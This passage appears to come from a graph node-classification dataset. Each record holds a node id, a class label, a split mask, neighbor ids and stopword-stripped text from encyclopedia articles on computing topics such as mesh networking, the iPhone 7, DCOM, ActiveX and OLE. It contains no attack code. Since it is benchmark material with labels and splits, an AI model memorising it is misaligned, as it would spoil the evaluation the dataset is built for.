    "text": "Mesh_networking:mesh networking mesh network simply meshnet local network topology infrastructure nodes i.e bridges switches infrastructure devices connect directly dynamically non-hierarchically many nodes possible cooperate one another efficiently route data from/to clients lack dependency one node allows every node participate relay information mesh networks dynamically self-organize self-configure reduce installation overhead ability self-configure enables dynamic distribution workloads particularly event nodes fail turn contributes fault-tolerance reduced maintenance costs mesh topology may contrasted conventional star/tree local network topologies bridges/switches directly linked small subset bridges/switches links infrastructure neighbours hierarchical star-and-tree topologies well established highly standardized vendor-neutral vendors mesh network devices yet agreed common standards interoperability devices different vendors yet assured mesh networks relay messages using either flooding technique routing technique routing message propagated along path hopping node node reaches destination ensure paths available network must allow continuous connections must reconfigure around broken paths using self-healing algorithms shortest path bridging self-healing allows routing-based network operate node breaks connection becomes unreliable result network typically quite reliable often one path source destination network although mostly used wireless situations concept also apply wired networks software interaction mesh network whose nodes connected fully connected network fully connected wired networks advantages security reliability problems cable affect two nodes attached however networks number cables therefore cost goes rapidly number nodes increases shortest path bridging allows ethernet switches connected mesh topology allows paths active wireless mesh radio networks originally developed military applications every node could dynamically serve router every node way even event failure nodes remaining nodes could continue communicate necessary serve uplinks nodes early wireless mesh network nodes single half-duplex radio one instant could either transmit receive time accompanied development shared mesh networks subsequently superseded complex radio hardware could receive packets upstream node transmit packets downstream node simultaneously different frequency different cdma channel allowed development switched mesh networks size cost power requirements radios declined nodes could cost-effectively equipped multiple radios turn permitted radio handle different function instance one radio client access another backhaul services work field aided use game theory methods analyze strategies allocation resources routing packets",
    "neighbors": [
      11267,
      5382,
      5767,
      9095,
      9478,
      9098,
      11399,
      5132,
      10646,
      11165,
      10399,
      7200,
      8608,
      8736,
      3751,
      10288,
      11696,
      10675,
      6719,
      2117,
      1733,
      3016,
      2511,
      4691,
      11094,
      4952,
      11483,
      10206,
      1503,
      610,
      6267
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10022,
    "label": 2,
    "text": "BioLinux:biolinux biolinux term used variety projects involved making access bioinformatics software linux platform easier using one following methods various projects similar aims linux systems unices selection given also overview canadian bioinformatics helpdesk newsletter details linux-based projects package repositories generally specific distribution linux bioinformatician using number linux variants prevalent bioinformatics work fedora freely-distributed version commercial red hat system red hat widely used corporate world offer commercial support training packages fedora core community supported derivative red hat popular amongst like red hat system n't require commercial support many users bioinformatics applications produced rpms red hat package format designed work fedora potentially also install red hat enterprise linux systems distributions mandriva suse use rpms packages may also work distributions debian another popular linux distribution use many academic institutions bioinformaticians made software packages available distribution deb format slackware one less used linux distributions popular better knowledge linux operating system prefer command line various guis available packages tgz tgx format widely known live distribution based slackware slax used base many bioinformatics distributions many linux packages compatible mac os x several projects attempt make easy install selected linux packages including bioinformatics software computer running mac os x source live dvds cds ideal way provide bioinformatics computing run cd/dvd drive means slower traditional hard disk installation limited ability configured however suitable providing ad hoc solutions linux access available may even used basis linux installation general linux distributions wide range official packages available usually include much way scientific support exceptions detailed gentoo linux provides 156 bioinformatics applications see gentoo sci-biology herd main tree form ebuilds build applications source code additional 315 packages gentoo science overlay testing although flexible system excellent community support requirement install source means gentoo systems often slow install require considerable maintenance possible reduce compilation time using central server generate binary packages hand fine tune run highest speed utilizing best processor example actually use sse avx avx2 cpu instructions binary-based distro usually provide binaries using i686 even i386 instruction sets freebsd linux distribution version unix similar ports like gentoo ebuilds caveats apply however also pre-complied binary packages available 60 biological sciences applications 're listed fresh ports site hundred bioinformatics packages provided part standard debian installation nebc bio-linux packages also installed standard debian system long bio-linux-base package also installed creates /usr/local/bioinf directory packages install software debian packages may also work ubuntu linux debian-derived installations providing support documentation important part biolinux project scientists specialists may quickly find answers specific problems support forums mailing lists also useful disseminate knowledge within research community resources linked",
    "neighbors": [
      8837,
      10149,
      5096,
      3791,
      304,
      2064,
      9455,
      10192,
      788,
      11126,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10023,
    "label": 2,
    "text": "IPhone_7:iphone 7 iphone 7 iphone 7 plus smartphones designed developed marketed apple inc tenth generation iphone announced september 7 2016 bill graham civic auditorium san francisco apple ceo tim cook released september 16 2016 succeeding iphone 6s iphone 6s plus flagship devices iphone series apple also released iphone 7 iphone 7 plus numerous countries worldwide throughout september october 2016 succeeded flagship devices iphone 8 iphone 8 plus september 22 2017 iphone x november 3 2017 iphone 7 overall design similar iphone 6s iphone 6 changes introduced included new color options matte black jet black water dust resistance new capacitive static home button revised antenna bands removal 3.5 mm headphone jack device internal hardware received upgrades including heterogeneous quad-core system-on-chip improved system graphics performance upgraded 12 megapixel rear-facing cameras optical image stabilization models additional telephoto lens exclusive iphone 7 plus provide enhanced 2x optical zoom capabilities reception iphone 7 mixed although reviewers noted improvements camera especially dual rear camera plus model also stated iphone 7 make significant changes display build quality competing flagship smartphones surpassed quality iphone 7 many reviews highlighted controversial removal 3.5 mm headphone jack critics argued change meant bolster licensing proprietary lightning connector sales apple wireless headphone products questioned effects change audio quality apple also mocked critics phil schiller statement drastic change required courage. ” iphone 7 subject several reported issues notably hissing noise heavy usage phones significant differences performance device variants apple released sales numbers iphone 7 multiple u.s. carriers reported high demand launch subsequent reports end 2016 stated apple reduced production models due sluggish sales decreasing demand though sales research first quarter 2017 placed devices best-selling smartphones world prior official announcement multiple aspects iphone 7 heavily rumored apple plans remove 3.5 mm headphone jack received significant media attention rumors included flush camera stereo speakers 256 gigabyte storage option larger 3,100 mah battery august 29 2016 invitations press event bill graham civic auditorium san francisco california september 7 2016 sent members media prompting immediate speculation iphone 7 upcoming announcement iphone 7 officially announced event pre-orders beginning september 9 general availability september 16 iphone 7 launched 30 new countries later september international rollouts throughout october november 2016 indonesia last country release iphone 7 7 plus availability starting march 31 2017 following apple research development investment country march 21 2017 apple announced iphone 7 red color finish white front part partnership product red highlight aids fundraising campaign launched march 24 2017 later discontinued announcement iphone 8 iphone 8 plus iphone x september 2017 september 2017 apple announced iphone 8 iphone 8 plus direct successors iphone 7 7 plus alongside iphone x iphone 7 exterior similar shape volume iphone 6 iphone 6s alongside existing silver gold rose gold colors device offered new colors matte black glossy jet black limited time red jet black color dark shade high-gloss black finish created multi-step process beginning anodization phase make surface casing porous aluminum oxide using machine sweep casing powdered compound absorbed aluminum oxide process concluded ultrafine particle bath additional finishing entire process takes less hour iphone 7 rated ip67 water dust resistant although tests resulted malfunctions specifically distorted speakers water exposure warranty cover water damage phone iphone 7 home button uses capacitive mechanism input rather physical push-button previous models meaning direct skin contact capacitive glove required operate device physical feedback provided via taptic engine vibrator button also pressure-sensitive iphone 7 retains 3d touch display system introduced iphone 6s providing pressure-sensitive touchscreen input iphone 7 feature 3.5 mm headphone jack replaced second speaker grille serves vent internal barometer lightning-to-3.5-mm-connector adapter well in-ear headphones use lightning connector bundled device adapter also sold separately accessory adapter also compatible iphone ipad ipod touch devices running ios 10 newer iphone 7 uses apple a10 fusion 64-bit system-on-chip consists two low-power cores two high-power cores two cores used point time a10 chip also features hexa-core graphics chip capable console-level gaming prior models iphone 7 available two sizes one 4.7-inch screen plus variant 5.5-inch screen displays identical sizes resolutions iphone 6s wider color gamut increased brightness screen-to-body ratio ~66 ~68 7 7 plus respectively device variants also contain new iteration apple motion coprocessor m10 unlike previous iphone models internal storage options iphone 7 begin 32 gb instead 16 gb max 256 gb iphone 7 plus offers 3 gb ram previous iphone 4.7-inch iphone 7 2 gb iphone 7 includes 12-megapixel rear-facing camera quad-led true tone flash aperture widened f/1.8 standard-size phone model adds optical image stabilization feature previously exclusive plus models iphone 7 plus includes second 12-megapixel telephoto lens used achieve 2× optical zoom 10× digital zoom front-facing camera upgraded 7-megapixel sensor automatic image stabilization iphone 7 originally shipped ios 10 pre-installed iphone 7 plus received exclusive portrait camera mode ios 10.1 software update camera mode capable producing bokeh effect using depth field analysis second camera dual-lens back iphone 7 plus iphone 7 originally came lightning-to-3.5-mm adapter although omitted starting september 12 2018 apple sells adapter independently well apple also unveiled several bluetooth wireless headphones ostensibly intended use iphone 7 including airpods wireless in-ear headphones three new beats headphone products four products utilize in-house wireless chip known apple w1 designed provide low-power bluetooth operation integration ios macos devices though still compatible bluetooth-supported devices reception iphone 7 mixed gordon kelly forbes noted rival smartphones samsung galaxy s7 increased battery life added water resistance predecessor retaining headphone jack iphone 7 camera photo quality improved still lagging behind phones already market including galaxy s7 nexus 6p kelly praised apple able extract improved brightness accurate color reproduction lcd display panel noting old technology also well behind rivals already moved sharper 1080p even 2k screens iphone 7 exterior reuses aging design iphone 6 iphone 6s criticized especially size device thick top/bottom bezels kelly writing iphone 7 plus simply far big smartphone 5.5-inch display nilay patel verge described devices full aggressive breaks convention despite design continuity previous models going far dubbing prototype next year rumored drastic iphone redesign disguised iphone 6 citing headphone jack removal felt attempt encourage use wireless headphones heterogeneous cpu home button redesign display quality considered improvement previous models albeit insane quad hd displays competing phones taptic engine considered first really valuable new ui concept 've seen phones years opposed gimmick 3d touch patel felt cameras devices step 6s terms performance praised dual-lens camera 7 plus enhancing phone camera functionality however panned lack editing features made use regards enhanced bluetooth audio support provided devices containing w1 chip argued apple took away established open standard favor new technologies instead making experience using new technologies better across board made every third-party wireless audio product second-class citizen apple ecosystem giving iphone 7 9 10 concluded devices legitimately among interesting opinionated powerful phones apple ever shipped confident expressions company vision long time ios 10 excellent cameras better performance phenomenal batteries last longer john mccann techradar wrote first time phablet-sized iphone 7 plus markedly better smaller model highlighted improved battery life praised camera calling plus dual cameras excellent point-and-shoot much improved low-light performance mccann wrote lack headphone jack initially frustrating noted positive step forward mobile industry despite short-term effects ... making noise criticism iphone 7 centered around removal headphone jack including inability use wired headphones included adapter charge device simultaneously particularly scathing article nilay patel verge wrote removing headphone jack ditching deeply established standard would user-hostile stupid goes list reasons removing port negative concluding one asking vote dollars gordon kelly forbes noted wireless audio technology immature moment bluetooth audio quality inferior lightning audio reliability still question removal headphone jack meant ’ pushed era pay decent headphones due need integrated dac and/or lightning licensing pointed company profit situation apple charging licensing fees millions headphone companies particular apple vice president phil schiller announced change mocked extensively online stating removing headphone jack took 'courage online petition created consumer group sumofus accuses apple planned obsolescence causing substantial electronic waste removing headphone jack reached 300,000 signatures users reported strange hissing noise heavy usage phone cnet reports faint buzzes hums coming backside daily telegraph speculates iphone 7 new a10 fusion processor source noise linking tweets compare phone hissing sound hearing fans spin loudly whenever mac ’ cpu gets used actual potential issue referred hissgate guardian reported october 2016 storage tests unbox therapy gsmarena showed 32 gb iphone 7 significantly slower 128 256 gb versions measuring data write speeds 341 mb/s 128 gb iphone 7 model versus 42 mb/s 32 gb model october 2016 network tests cellular insights showed models a1660 a1661 qualcomm modems significant performance edge models a1778 a1784 intel modems inspection modems also found qualcomm version ability use ultra hd voice turned likely level playing field qualcomm intel variants report concluded statement sure main reason behind apple decision source two different modem suppliers newest iphone bloomberg reported november 2016 tests researchers twin prime cellular insights shown two modems perform similarly u.s. cellular networks despite one modems technically capable faster connectivity apple spokeswoman trudy muller told publication every iphone 7 iphone 7 plus meets exceeds apple ’ wireless performance standards quality metrics reliability testing ... rigorous lab tests based wireless industry standards thousands hours real-world field testing extensive carrier partner testing data shows discernible difference wireless performance models bloomberg quoted analysts technology advisers stated apple ’ want one version get reputation better may impact fanboys may make consumers think twice buying apple phone especially think might purchasing sub-standard product similar manner now-discontinued samsung galaxy note 7 reports iphone 7 exploding emitting smoke september 2016 one device reportedly exploded transit another one malfunction caused battery blow internally another report iphone 7 emitting smoke melting published october 2016 iphone 7 7 slogan misunderstood translated certain languages phone slogan mainland china 7 hong kong slogan iphone 7 cantonese local language hong kong slogan could mistakenly interpreted penis tsat common slang term erect penis seven varies tone often used euphemism iphone 7 apple added software lock prevents individuals attempting replace home button users required go apple store repairs done recalibration button necessary step apple went iphone 5s 6 6s touch id functionality would get disabled return-to-home functionality still worked iphone 7 devices model numbers a1660 a1779 a1780 suffer problem show service message even cellular reception available apple repair devices free within two years first retail sale unit apple deliberately withheld pre-order sales numbers citing longer representative metric investors customers without releasing specific numbers t-mobile us stated iphone 7 broken carrier all-time record first-day pre-order sales following weekend t-mobile us stated iphone 7 biggest iphone launch ever nearly 4x compared next popular iphone september 14 2016 two days iphone 7 went sale apple announced due high demand sold jet black iphone 7 colors iphone 7 plus caused issues customers iphone upgrade program unable reserve new phones customer complaints class action lawsuit apple made changes ensure members program could get new phones soon possible may 2017 analytics research company strategy analytics announced iphone 7 iphone 7 plus best-selling smartphones worldwide first quarter 2017 selling 21.5 million 17.4 million units respectively initial u.s. sales iphone 7 four major wireless carriers announced trade-in deals deals monthly installment plan cost iphone 7 negated monthly credit consumers bill consumers cancel service carrier pay phone prior installment contract completion receive credits remaining months jacob kastrenakes verge noted deals effectively constituted return two-year phone contracts deals essentially lock carrier two years wake deals verizon announced seen increase sales release previous year iphone 6s said sales exceeded expectations t-mobile sprint announced huge increases sales t-mobile seeing demand roughly four times higher 7 6 december 2016 digitimes reported apple reduced production iphone 7 decreasing demand product initial surge interest waned reason cited consumers suppliers turning attention next year iphone model new report nikkei end december included details sales production iphone 7 report based data suppliers stated apple would trim production iphone 7 10 first quarter 2017 following sluggish sales nikkei reported apple previously trimmed production iphone 7 20 due accumulated inventory previous model new models sold sluggishly expected additionally report notes iphone 7 plus features two cameras back face remains popular shortage camera sensors curbed apple ability meet demand phones",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      6268,
      2686,
      6783,
      7292,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      7579,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 10024,
    "label": 7,
    "text": "Distributed_Component_Object_Model:distributed component object model distributed component object model dcom proprietary microsoft technology communication software components networked computers dcom originally called network ole extends microsoft com provides communication substrate microsoft com+ application server infrastructure addition com due extensive use dce/rpc distributed computing environment/remote procedure calls – specifically microsoft enhanced version known msrpc terms extensions added com dcom solve problems one key factors solving problems use dce/rpc underlying rpc mechanism behind dcom dce/rpc strictly defined rules regarding marshalling responsible freeing memory dcom major competitor corba proponents technologies saw one day becoming model code service-reuse internet however difficulties involved getting either technologies work internet firewalls unknown insecure machines meant normal http requests combination web browsers microsoft one point attempted failed head adding extra http transport dce/rpc called ncacn_http network computing architecture connection-oriented protocol later resurrected support microsoft exchange 2003 connection http dcom supported natively windows nt 4.0 windows 2000 windows xp windows server 2003 well windows 7 windows 8 windows 10 windows server 2008 windows server 2008 r2 windows server 2012 windows server 2012 r2 windows server 2016 part initiative began microsoft part secure development lifecycle re-architect insecure code dcom saw significant security-focused changes windows xp service pack 2 comsource source code available along full complete documentation sufficient use also implement interoperable version dcom according documentation comsource comes directly windows nt 4.0 source code even includes source code windows nt registry service wine team also implementing dcom binary interoperability purposes currently interested networking side dcom provided msrpc restricted implementing ndr network data representation microsoft api committed making compatible possible msrpc tangramcom separate project wine focusing implementing dcom linux-based smartphones samba team also implementing dcom over-the-wire interoperability purposes unlike wine team currently interested binary-interoperability samba msrpc implementation far binary-interoperable microsoft msrpc",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      5665,
      9762,
      2083,
      8227,
      8740,
      6694,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      1630,
      8798,
      1632,
      2145,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      8396,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9441,
      4836,
      9442,
      4326,
      2279,
      10465,
      1770,
      9962,
      3308,
      3821,
      11498,
      10991,
      10993,
      242,
      2804,
      10486,
      3834,
      1791,
      2304,
      8959,
      11519,
      6927,
      3856,
      8975,
      8976,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      6948,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      321,
      3394,
      1348,
      844,
      6993,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      3471,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      2980,
      5029,
      3494,
      1447,
      8100,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      7629,
      3535,
      4562,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10025,
    "label": 6,
    "text": "Ncdu:ncdu ncdu ncurses disk usage disk utility unix systems name refers similar purpose du utility ncdu uses text-based user interface n curses programming library users navigate list using arrow keys delete files taking much space pressing 'd key version 1.09 later export file listing json format ncdu developed yoran heling learn c serve disk usage analyzer remote systems ssh",
    "neighbors": [
      10341,
      7983,
      9204,
      5492,
      823,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10026,
    "label": 2,
    "text": "ActiveX:activex activex software framework created microsoft adapts earlier component object model com object linking embedding ole technologies content downloaded network particularly world wide web microsoft introduced activex 1996 principle activex dependent microsoft windows operating systems practice activex controls run windows also require client running x86-based computer activex controls contain compiled code activex still supported windows 10 internet explorer 11 activex supported default web browser microsoft edge different incompatible extension system compatible new chromium-based microsoft edge using ie mode activex one major technologies used component-based software engineering compared javabeans activex supports programming languages javabeans supports platforms activex supported many rapid application development technologies active template library delphi javabeans microsoft foundation class library qt visual basic windows forms wxwidgets enable application developers embed activex controls products many microsoft windows applications—including many microsoft internet explorer microsoft office microsoft visual studio windows media player—use activex controls build feature-set also encapsulate functionality activex controls embedded applications internet explorer also allows embedding activex controls web pages faced complexity ole 2.0 poor support com mfc microsoft simplified specification rebranded technology activex 1996 even simplification users still required controls implement six core interfaces response complexity microsoft produced wizards atl base classes macros c++ language extensions make simpler write controls starting internet explorer 3.0 1996 microsoft added support host activex controls within html content browser encountered page specifying activex control via codice_1 tag would automatically download install control little user intervention made web richer provoked objections since controls practice ran windows separate controls required supported platform one windows 3.1/windows nt 3.51 one windows nt/95 one macintosh f68k/powerpc security risks especially given lack user intervention microsoft subsequently introduced security measures make browsing including activex safer example activex controversial start microsoft claimed programming ease good performance compared java applets marketing materials critics activex quick point security issues lack portability making impractical use outside protected intranets activex security model relied almost entirely identifying trusted component developers using code signing technology called authenticode developers register verisign us 20 per year individuals 400 corporations sign contract promising develop malware identified code would run inside web browser full permissions meaning bug code potential security issue contrasts sandboxing already used java time october 1996 microsoft released beta version activex software development kit sdk macintosh including plug-in netscape navigator mac announced plan support activex solaris later year six months two beta releases later yet commercially available macintosh activex plugins 1997 ncompass labs cooperation microsoft released plug-in netscape navigator support activex documentation activex core technology resides open group may downloaded free despite microsoft previous efforts make activex cross-platform activex controls work platforms using activex controls implement essential functionality web page restricts usefulness south korea started remove technology public websites order make web site accessible platforms microsoft made significant effort push cross-platform aspect activex way publishing api ultimately cross-platform effort failed due activex controls written c c++ compiled intel x86 assembly language making executable windows machines call standard win32 apis microsoft dropped activex support windows store edition internet explorer 10 windows 8 2015 microsoft released microsoft edge replacement internet explorer support activex marked end technology microsoft web browser development may always possible use internet explorer execute activex content e.g. wine installation may user want microsoft developed large number products software platforms using activex objects still used e.g. websites still use asp",
    "neighbors": [
      9216,
      513,
      10243,
      11270,
      8200,
      5643,
      9229,
      4624,
      10769,
      9234,
      1043,
      1556,
      6679,
      537,
      6171,
      540,
      7708,
      3102,
      1055,
      5663,
      7713,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      2603,
      7212,
      10282,
      10284,
      4143,
      9263,
      4658,
      2099,
      8243,
      1077,
      2101,
      8246,
      10808,
      11316,
      3643,
      10812,
      6717,
      3648,
      8262,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      8281,
      603,
      92,
      9819,
      1632,
      2145,
      2146,
      3170,
      4198,
      7784,
      9834,
      622,
      9839,
      9328,
      9841,
      4210,
      7796,
      119,
      1656,
      6265,
      5754,
      4731,
      124,
      7290,
      8312,
      8315,
      9340,
      5761,
      10879,
      9348,
      5765,
      10886,
      2183,
      8841,
      5259,
      653,
      6797,
      7822,
      2193,
      9874,
      2196,
      10900,
      4247,
      3224,
      4248,
      10392,
      7326,
      7838,
      5281,
      8865,
      3235,
      4771,
      6820,
      7846,
      1703,
      9377,
      5631,
      2221,
      10414,
      5300,
      7351,
      10428,
      2749,
      4797,
      2244,
      8391,
      200,
      11466,
      9420,
      10448,
      214,
      9943,
      2777,
      5849,
      9434,
      2782,
      2783,
      736,
      4321,
      6366,
      6370,
      4836,
      9442,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      242,
      2804,
      3834,
      7930,
      1791,
      8959,
      11519,
      1802,
      10506,
      6927,
      3344,
      3856,
      9491,
      7957,
      790,
      3351,
      5401,
      5913,
      6938,
      8473,
      8985,
      8988,
      11546,
      4384,
      9505,
      10020,
      5413,
      2854,
      11559,
      5928,
      3881,
      8488,
      10024,
      1837,
      10029,
      11570,
      1844,
      9525,
      11060,
      10039,
      11572,
      6972,
      5952,
      11584,
      3394,
      1348,
      844,
      8526,
      847,
      3920,
      3922,
      4439,
      5465,
      7515,
      10079,
      11616,
      865,
      2402,
      3425,
      7523,
      2919,
      4458,
      6506,
      4972,
      9066,
      9593,
      2943,
      3462,
      2441,
      1418,
      5003,
      5004,
      6028,
      9609,
      3471,
      8080,
      9612,
      11154,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      5546,
      10872,
      430,
      6062,
      10673,
      2485,
      9655,
      6584,
      1978,
      1468,
      2493,
      4542,
      960,
      10176,
      8132,
      8644,
      6088,
      969,
      7629,
      974,
      3535,
      9167,
      8659,
      11223,
      5593,
      1498,
      5594,
      477,
      478,
      5597,
      8161,
      6114,
      3555,
      6115,
      2027,
      5612,
      6637,
      494,
      4590,
      9196,
      6641,
      8689,
      499,
      9709,
      3573,
      10229,
      11247,
      11248,
      2045,
      9726,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10027,
    "label": 6,
    "text": "PowerArchiver:powerarchiver powerarchiver proprietary file archiver microsoft windows developed conexware inc supports full read-write access several different archive formats including zip 7z tar additionally read-only decompression support includes rar ace various disk image formats evaluation version program remains functional 40 days personal licenses currently permitted free lifetime updates future versions software business license valid two major versions powerarchiver first public release made march 1999 advertised free archiving solution written borland delphi turned shareware june 2001 version 7 prior powerarchiver software known easyzip command line version microsoft outlook plugin also provided powerarchiver user interface translated 15 languages latest release powerarchiver fully supports windows 7 provides user option use ribbon gui featured microsoft office 2007 windows 7 users revert old-style toolbar wish 2011 softpedia gave five stars praising wide support various compressed file types ftp backup feature pointing lack complete support vhd files later 2013 download.com gave five stars",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      7983,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      6240,
      5858,
      9953,
      6759,
      7529,
      106,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 10028,
    "label": 8,
    "text": "Geliyoo:geliyoo geliyoo bilişim turkish multinational corporation specializing internet-related services products include search cloud computing software online advertising technologies geliyoo founded hakan atabaş graduated odtü fatih arslan m.s students texas tech university enhance search technologies turkey goal geliyoo developed team turkish engineers also geliyoo wants gain love turkish people leading field incorporated geliyoo privately held company april 5 2012 mission statement organize secure world information make globally accessible useful unofficial motto new technology geliyoo known €741,000 spent developed geliyoo without income ads till 2012 first award given two categories e-innovation e-telecommunication informatics association turkey geliyoo search web search engine company popular service geliyoo developed search engine crawler geliyoo spider geliyoobot/1.0 developed geliyoo first turkish search engine bot geliyoobot/1.0 builds searchable index geliyoo search engine webmaster wishes restrict information site available geliyoobot another well-behaved spider appropriate directives robots.txt file adding meta tag codice_1 web page geliyoo spider requests web servers identifiable user-agent string containing geliyoobot host address containing geliyoo.com geliyoo directory project gmoz gmoz.geliyoo.com original domain name multilingual open content directory world wide web links owned geliyoo constructed maintained community volunteer editors gmoz uses hierarchical ontology scheme organizing site listings listings similar topic grouped categories include smaller categories gmoz helps geliyoo search results geliyoo news free news aggregator provided operated geliyoo selecting up-to-date information thousands publications automatic aggregation algorithm service covers news articles appearing within past 30 days various news websites geliyoo maps web mapping service application technology provided geliyoo powers many map-based services including geliyoo maps website includes traffic offers street maps route planner traveling car geliyoo maps uses tom tom base maps geliyoo also develops first turkish web browser called geliyoo browser offers powerful browsing together built-in media downloading sharing features geliyoo browser based chromium technology platform supports torrent files tells geliyoo browser combines oracle java semantic web web 3.0 technologies",
    "neighbors": [
      4194,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10029,
    "label": 2,
    "text": "Object_Linking_and_Embedding:object linking embedding object linking embedding ole proprietary technology developed microsoft allows embedding linking documents objects developers brought ole control extension ocx way develop use custom user interface elements technical level ole object object implements codice_1 interface possibly along wide range interfaces depending object needs ole allows editing application export part document another editing application import additional content example desktop publishing system might send text word processor picture bitmap editor using ole main benefit ole add different kinds data document different applications like text editor image editor creates compound file binary format document master file document makes reference changes data master file immediately affect document references called linking instead embedding ole also used transferring data different applications using drag drop clipboard operations ole 1.0 released 1990 evolution original dynamic data exchange dde concept microsoft developed earlier versions windows dde limited transferring limited amounts data two running applications ole capable maintaining active links two documents even embedding one type document within another ole servers clients communicate system libraries using virtual function tables vtbls vtbl consists structure function pointers system library use communicate server client server client libraries olesvr.dll olecli.dll originally designed communicate using wm_dde_execute message ole 1.0 later evolved become architecture software components known component object model com later dcom ole object placed clipboard embedded document visual representation native windows formats bitmap metafile stored well underlying data format allows applications display object without loading application used create object also allowing object edited appropriate application installed object packager component ole shipping windows 3.1 windows xp allows non-ole object packaged embedded ole client ole 2.0 next evolution ole sharing many goals version 1.0 re-implemented top com instead using vtbls directly new features ole automation drag-and-drop in-place activation structured storage monikers evolved ole 1 object names provided hierarchical object resource naming system similar urls uris independently invented windows merged two technologies supporting url moniker type moniker url scheme ole custom controls introduced 1994 replacement deprecated visual basic extension controls instead upgrading new architecture based ole particular container supported ole 2.0 could already embed ole custom controls although controls react events unless container supports ole custom controls usually shipped form dynamic link library .ocx extension 1996 interfaces controls except iunknown made optional keep file size controls would download faster called activex controls ole objects containers implemented top component object model objects implement interfaces export functionality ioleobject interface compulsory interfaces may also need implemented functionality exported interfaces required ease understanding follows terminology explained view status object whether object transparent opaque opaque solid background whether supports drawing specified aspect site object object representing location object container container supports site object every object contained follows list interfaces grouped object usually needs implement interfaces usually implemented ole object usually called ole container vice versa note following list indentation indicates interface inheritance non-indented interfaces derive iunknown opendoc technology tried compete ole microsoft competitors considered opendoc robust easier use however opendoc known problems opendoc allowed users view edit information across applications directly competition microsoft proprietary ole standard 1993 microsoft competitors established consortium called component integration laboratories cil develop opendoc open standard cross-platform linking embedding microsoft required ole compatibility condition microsoft certification application compatibility windows 95 microsoft initially announced applications using opendoc would deemed compatible ole would receive certification windows 95 microsoft later reversed decision said applications using opendoc might receive certification microsoft withheld specifications debugged versions ole released competing applications use microsoft object linking embedding ole objects limits interoperability objects widely supported programs viewing editing files e.g embedding files inside file tables charts spreadsheet application text document presentation file software understands ole object available object usually replaced picture bitmap representation object displayed",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      1043,
      537,
      540,
      3102,
      1055,
      5663,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      10310,
      2632,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
